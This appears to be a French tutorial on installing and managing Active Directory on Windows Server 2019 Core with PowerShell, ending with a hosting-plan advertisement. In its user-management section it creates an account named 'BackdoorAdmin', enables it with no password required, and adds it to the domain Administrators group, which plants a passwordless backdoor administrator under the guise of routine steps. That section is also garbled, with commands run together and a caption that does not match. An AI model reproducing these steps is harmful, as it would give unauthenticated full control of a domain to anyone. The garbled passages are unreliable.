L'une des innovations vraiment utiles de Windows Server 2019 est la possibilité d'entrer sur les serveurs sans avoir à faire Sysprep ou une installation propre. Déployer une infrastructure sur des serveurs virtuels avec Windows Server n'a jamais été aussi simple.
Aujourd'hui, nous allons parler de la facilité d'installation et de gestion d'Active Directory via Powershell.
Définissez le rôle
RSAT ou serveur local avec GUI:Vous devez d'abord ajouter le serveur à RSAT. Il est ajouté sur la page principale à l'aide d'un nom de domaine ou d'une adresse IP. Assurez-vous que vous entrez la connexion au format
local\Administrator , sinon le serveur n'acceptera pas le mot de passe.
Accédez à ajouter des composants et sélectionnez AD DS.
Powershell:Si vous ne connaissez pas le nom du composant système, vous pouvez exécuter la commande et obtenir une liste des composants disponibles, leurs dépendances et leurs noms.
Get-WindowsFeature
Copiez le nom du composant et poursuivez l'installation.
Install-WindowsFeature -Name AD-Domain-Services
Centre d'administration Windows:
Allez dans "Rôles et fonctionnalités" et sélectionnez ADDS (Services de domaine Active Directory).
Et c'est littéralement tout. Il n'est actuellement pas possible de gérer Active Directory via le Centre d'administration Windows. Sa mention n'est rien d'autre qu'un rappel de son inutilité jusqu'à présent.
Élever le serveur vers un contrôleur de domaine
Et pour cela, nous créons une nouvelle forêt.
RSAT ou serveurs GUI locaux:Nous vous recommandons fortement de tout laisser par défaut, tous les composants hors de la boîte fonctionnent bien et ils n'ont pas besoin d'être touchés sans besoin particulier.
Powershell:Vous devez d'abord créer une forêt et définir un mot de passe pour celle-ci. Powershell a un type de variable distinct pour les mots de passe - SecureString, qui est utilisé pour stocker en toute sécurité un mot de passe dans la RAM et le transférer en toute sécurité sur le réseau.
$pass = Read-Host -AsSecureString
Toute applet de commande qui utilise le mot de passe de quiconque doit être entrée de cette manière. Tout d'abord, écrivez le mot de passe dans SecureString, puis spécifiez cette variable dans l'applet de commande.
Install-ADDSForest -DomainName test.domain -SafeModeAdministratorPassword $pass
Comme dans l'installation via l'interface graphique, même la sortie vers la console est la même. Contrairement à un serveur avec une interface graphique, l'installation d'un rôle et l'installation d'un serveur en tant que contrôleur de domaine ne nécessitent pas de redémarrage.
L'installation du contrôleur à l'aide de RSAT prend plus de temps qu'à l'aide de Powershell.
Nous gérons le domaine
Maintenant, pour comprendre à quel point la gestion d'Active Directory diffère via Powershell et AD AC (Active Directory Administrative Center), considérons quelques exemples pratiques.
Créer un nouvel utilisateur
Supposons que nous voulons créer un utilisateur dans le groupe Utilisateurs et que nous lui définissions un mot de passe. Via AD AC, cela ressemble à ceci:
New-ADUser -Name BackdoorAdmin -UserPrincipalName BackdoorAdmin@test Get-ADUser BackdoorAdmin
Il n'y a aucune différence entre AD DC et Powershell.
Activer l'utilisateur
RSAT ou serveurs GUI locaux:Grâce à l'interface graphique, l'utilisateur doit d'abord définir le mot de passe correspondant à l'objet de stratégie de groupe et seulement après cela, il peut être activé.
Powershell:Powershell est presque la même chose, seul l'utilisateur peut être activé même sans mot de passe.
Set-ADUser -Identity BackdoorAdmin -Enabled $true -PasswordNotRequired $true
Ajouter un utilisateur au groupe
RSAT ou serveur local avec GUI:À l'aide d'AD DC, vous devez accéder aux propriétés de l'utilisateur, rechercher la colonne avec l'appartenance utilisateur dans les groupes, rechercher le groupe dans lequel nous voulons le placer et l'ajouter enfin, puis cliquer sur OK.
Powershell:Si nous ne connaissons pas le nom du groupe dont nous avons besoin, nous pouvons en obtenir la liste en utilisant:
(Get-ADGroup -Server localhost -Filter *).name
Vous pouvez obtenir un groupe avec toutes les propriétés comme ceci:
Get-ADGroup -Server localhost -Filter {Name -Like "Administrators"}
Enfin, ajoutez l'utilisateur au groupe:
De plus, étant donné que tout est un objet dans Powershell, nous, comme via AD DC, devons d'abord obtenir un groupe d'utilisateurs, puis l'ajouter.
$user = Get-ADUser BackdoorAdmin
Ajoutez ensuite cet objet au groupe:
Get-ADGroup -Server localhost -Filter {Name -Like "Administrators"} | Add-ADGroupMember -Members $user
Et vérifiez:
Get-ADGroupMember -Identity Administrators
Comme vous pouvez le voir, il n'y a presque aucune différence dans la gestion de AD via AD AC et Powershell.
Conclusion:
Si vous avez déjà rencontré le déploiement d'AD et d'autres services, vous avez peut-être remarqué les similitudes du déploiement via RSAT et Powershell, et à quoi tout ressemble vraiment. GUI dans le noyau, après tout.
Nous espérons que l'article a été utile ou intéressant.
Et enfin, quelques conseils pratiques:
- N'installez pas d'autres rôles sur un contrôleur de domaine.
- Utilisez BPA (Best practice analyzer) pour accélérer un peu le contrôleur
- N'utilisez pas l'administrateur Enterprice intégré, utilisez toujours votre propre compte.
- Lors du déploiement du serveur sur une adresse IP blanche, avec des ports redirigés ou sur VSD, assurez-vous de fermer le port 389, sinon vous deviendrez le point d'amplification des attaques DDoS.
Nous vous proposons également de lire nos articles précédents: une
histoire sur la façon dont nous préparons les machines virtuelles clientes en utilisant l'exemple de notre tarif
VDS Ultralight avec Server Core pour 99 roubles,
comment travailler avec Windows Server 2019 Core et comment installer une interface graphique dessus , et comment
gérer le serveur à l'aide de Windows Admin Centre comment
installer Exchange 2019 sur Windows Server Core 2019
Nous proposons un tarif UltraLite
Windows VDS mis à jour pour 99 roubles avec Windows Server 2019 Core installé.
